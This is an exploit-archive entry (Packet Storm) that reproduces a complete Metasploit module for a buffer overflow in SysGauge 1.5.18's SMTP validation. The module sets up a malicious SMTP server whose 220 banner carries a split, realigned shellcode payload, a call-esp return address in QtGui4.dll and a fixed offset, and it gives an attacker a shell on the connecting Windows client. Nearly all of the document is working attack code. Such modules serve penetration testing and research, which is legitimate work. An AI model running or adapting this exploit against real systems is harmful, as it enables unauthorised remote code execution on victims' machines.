SysGauge SMTP Validation Buffer Overflow

2017-03-22T00:00:00
ID PACKETSTORM:141761
Type packetstorm
Reporter Chris Higgins
Modified 2017-03-22T00:00:00

Description

                                        
                                            `#  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
#  
  
class MetasploitModule < Msf::Exploit::Remote  
include Msf::Exploit::Remote::TcpServer  
  
Rank = NormalRanking  
  
def initialize()  
super(  
'Name' => 'SysGauge SMTP Validation Buffer Overflow',  
'Description' => %q{  
This module will setup an SMTP server expecting a connection from SysGauge 1.5.18  
via its SMTP server validation. The module sends a malicious response along in the  
220 service ready response and exploits the client, resulting in an unprivileged shell.  
},  
'Author' =>  
[  
'Chris Higgins', # msf Module -- @ch1gg1ns  
'Peter Baris' # Initial discovery and PoC  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'EDB', '41479' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread'  
},  
'Payload' =>  
{  
'Space' => 306,  
'BadChars' => "\x00\x0a\x0d\x20"  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows Universal',  
{  
'Offset' => 176,  
'Ret' => 0x6527635E # call esp # QtGui4.dll  
}  
]  
],  
'Privileged' => false,  
'DisclosureDate' => 'Feb 28 2017',  
'DefaultTarget' => 0  
)  
register_options(  
[  
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),  
])  
end  
  
def on_client_connect(c)  
# Note here that the payload must be split into two parts.  
# The payload gets jumbled in the stack so we need to split  
# and align to get it to execute correctly.  
sploit = "220 "  
sploit << rand_text(target['Offset'])  
# Can only use the last part starting from 232 bytes in  
sploit << payload.encoded[232..-1]  
sploit << rand_text(2)  
sploit << [target.ret].pack('V')  
sploit << rand_text(12)  
sploit << make_nops(8)  
# And the first part up to 232 bytes  
sploit << payload.encoded[0..231]  
sploit << "ESMTP Sendmail \r\n"  
  
print_status("Client connected: " + c.peerhost)  
print_status("Sending payload...")  
  
c.put(sploit)  
end  
  
end  
`